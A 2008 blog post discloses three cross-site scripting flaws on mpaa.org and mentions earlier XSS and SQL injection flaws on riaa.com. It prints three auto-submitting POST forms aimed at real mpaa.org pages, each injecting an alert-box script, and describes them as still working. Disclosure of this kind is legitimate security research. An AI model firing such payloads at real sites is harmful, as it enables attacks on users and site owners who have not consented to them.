Feed subscription » blog | » comments | » irc | » mobi | » twitter

Security vulnerabilities at Mpaa.org

Security vulnerabilities at Mpaa.orgFew days ago i have written an article about pages of RIAA, which has contained dozens of XSS vulnerabilities. I wasn’t the only one, i am certainly sure, that you have received this information from other sources too. Others tried to do DOS attack on page via SQL Injection.

MPAA.org XSS POCMPAA (The Motion Picture Association of America) is an organization , which represents film studios in the USA. MPAA, same as RIAA and other alike organizations ( e.g. IFPI), is very unpopular in p2p community. Nowadays, it has been discovered, that numbers, on which MPAA made very bad lobbing, from statistics, which have been created by other company for MPAA, were not correct (more at Silicon Valley Insider (eng), or Pooh (cz)). But this is not subject of this article.

RIAA.org XSS POCAfter test of Riaa.com i have decided to check Mpaa.org . I have seen the biggest companies with the worst security solutions, so I have been running into this test without expectations. Riaa.com contained 40 vulnerabilities, which allowed use of XSS technique, and on half of them use of SQL Injection. RIAA have reacted on this fact almost instantly (They didn’t had another option, because users was bombarding site with benchmark tests on databases and site’s usability was scaled down). RIAA didn’t removed all the vulnerabilities, they removed only those, described on English speaking medias/blogs. That is the reason, why one vulnerability, which i have discovered is still working. Mpaa.org is a big portal, bigger than Riaa.com. I have found “only” three vulnerabilities, which allow an attacker use of XSS technique.

Mpaa.org does allow only use of vulnerability just by using POST method for sending data to webserver. That mean that, we are not able to send data via url, but we need script for it. I have created three POC examples, which are at this very moment fully working.

Example 1:
<form method="POST" action="http://www.mpaa.org/thank_you.asp" name="explForm">
<input type="hidden" name="txtfavoritemovie" value='<script>alert("xss")</script>'>
</form>
<script language="Javascript">
setTimeout("explForm.submit()", 1);
</script>
Example 2:
<form method="POST" action="http://www.mpaa.org/thank_you.asp" name="explForm">
<input type="hidden" name="name" value='>"><script>alert ("xss")</script>'>
</form>
<script language="Javascript">
setTimeout("explForm.submit()", 1);
</script>
Example 3:
<form method="POST" action="http://www.mpaa.org/flmrat_srchreslts.asp" name="explForm">
<input type="hidden" name="txtsearch" value='<script>alert ("xss")</script>'>
</form>
<script language="Javascript">
setTimeout("explForm.submit()", 1);
</script>

As i have mentioned above, RIAA hasn’t removed all the vulnerabilities, so i am attaching POC for Riaa.com. You can try that here.



Príbuzné články:
  • Bezpečnostné chyby na Mpaa.org
  • Torrentspy.com skončil vďaka MPAA, kto bude ďalší?
  • Desiatky bezpečnostných chýb na Riaa.com
  • Nejde vám hlasovať na vybrali.sme.sk? Moja chyba
  • Symantec Internet Security Threat Report

    • Tagy: get, ifpi, movies, mpaa, post, proof of concept, riaa, studios, xss, zranitelnosti
    24.01.2008, 05:47 - ayslix
    Kategórie: English and XSS

    0 Responses to “Security vulnerabilities at Mpaa.org”

    1. No Comments

    Zanechajte odkaz

    • na ďalšie komentáre odkazujte za použitia čísla komentáru v hranatej zátvorke, napríklad [3]
    • vaša IP adresa je logovaná a zneužívaná na výskumné účely
    • môžete mi tykať
    • komentáre sú moderované, kritiku prijímam, snažte sa prosím strániť invektív